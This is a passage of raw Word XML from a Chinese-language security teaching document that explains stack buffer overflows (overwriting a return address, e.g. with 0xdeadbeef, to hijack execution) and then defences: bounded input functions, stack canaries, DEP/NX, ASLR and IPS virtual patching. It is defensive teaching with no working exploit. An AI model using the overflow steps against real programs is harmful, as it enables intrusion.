        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"A"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2D687D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多余数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到相邻内存区域（水溢出杯子浸湿桌子）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0E560F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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何被利用：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04083E57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精心构造的输入数据中包含恶意代码（如开启后门的指令）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4C4E9F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溢出部分覆盖关键内存地址（如函数返回地址）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4970FA62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程序执行流被劫持，跳转到恶意代码执行（电脑控制权被夺取）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E426C87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攻击流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254A323D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>越界写入：向</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>buffer[8]</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入超长数据（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'A'</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7614AB" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>覆盖关键区域：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03BB0B" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多余数据覆盖返回地址（存储下条指令位置的内存）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2B3D16" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持程序流：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED32F4A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将返回地址覆盖为恶意代码地址（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0xdeadbeef</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9E980" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行恶意代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0F8F25" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跳转到指定地址执行攻击者指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF34866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类比：快递员本应把包裹放进</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号柜（安全区域），却强行塞入导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>号柜（关键区域）的门被挤开</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262D2F3F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防御方案</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7A5496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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开发阶段防御</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260BCA06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>&lt;C&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D51FF41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 xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>安全代码写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBA277F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 xml:space="preserve">fgets(buffer, sizeof(buffer), stdin); // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>限制输入长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A0689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 xml:space="preserve">snprintf(buffer, sizeof(buffer), "%s", input); // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>安全格式化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F296F9E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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译防护技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ABBC90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栈保护（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Stack Canary</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6DDB0B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在缓冲区末尾插入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>金丝雀值</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，若被修改则崩溃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67792310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数据执行保护（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D43167F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标记内存页不可执行，阻止恶意代码运行（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：数据执行保护；</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NX</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C2DF61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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作系统防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C004C87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lastRenderedPageBreak/>
        <w:t>地址空间随机化（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASLR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2284AB0B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每次运行程序时随机排列内存地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A280DD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>防火墙（虚拟补丁）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33367D25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什么是虚拟补丁？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6BCCA2" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传统补丁：修改软件代码修复漏洞（需重启服务）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9634AC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虚拟补丁：在网络层拦截攻击流量（不停机即时防护）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F91D0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工作原理（像海关安检）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A399E8C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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>深度包检测（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DPI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F842D5C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络流量内容（不仅看</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCD0DB9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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击特征匹配：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319429E1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对比已知攻击模式（如超长</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C177502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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实时拦截：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF08027" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>丢弃恶意数据包并告警</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07713B60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典型防护场景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFF983C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攻击者发送恶意数据包</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防火墙检测到缓冲区溢出特征</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>立即阻断连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>管理员收到告警</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器毫发无损</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FFEC6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与传统</w:t>
      </w:r>
      <w:bookmarkStart w:id="12" w:name="_Hlk200656570"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>防火墙对比</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="565DEEFC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>防火墙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020"/>
        <w:gridCol w:w="3626"/>
        <w:gridCol w:w="3198"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="619BA529" w14:textId="77777777" w:rsidTr="00501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CA61987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能力</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="20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B2E4408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传统防火墙</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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8F4C7A3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IPS</w:t>
            </w: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防火墙</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="21A955A1" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B1BF3EE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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>检测内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2050" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A69C9B9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IP/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端口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/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协议</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1808" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="776CBD5B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数据包内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="67A96F43" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1142" w:type="pct"/>
